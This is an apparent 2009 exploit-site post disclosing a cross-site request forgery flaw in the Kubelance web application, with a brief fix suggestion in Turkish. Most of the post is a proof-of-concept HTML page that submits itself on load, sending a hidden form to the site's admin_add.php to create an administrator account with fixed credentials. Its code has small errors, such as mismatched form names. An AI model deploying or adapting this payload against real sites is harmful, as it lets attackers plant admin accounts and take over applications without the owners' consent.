Kubelance ~ XSRF | Cyber-Warrior Information Technology's World

Root > Exploits / Vulnerabilities > Kubelance ~ XSRF

Madde
	Author : Bug Researchers/BizaRRo
	Date : 03.02.2009 00:25:18
	# Kubelance ~ XSRF [Full Screen Display]

	< ------------------- header data start ------------------- > ############################################################# # Application Name : Kubelance # Vulnerable Type : XSRF # Infection : Uzaktan otomatik olarak admin pass change edilebilir. # Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir. # author : Bug Researchers/BizaRRo ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > <b0dy onLoad=Submit();> <script>function Submit[]{document.BizaRRo.submit();}</script> <form action=http://www.SITE.com/[PATCH]/adm/admin_add.php method=post name=form_admin_user> <input name=username type=hidden class=textbox id=username value=addadd> <input name=password type=hidden class=textbox id=password value=addadd> <input type=submit value=create name=B1> < -- bug code end of -- >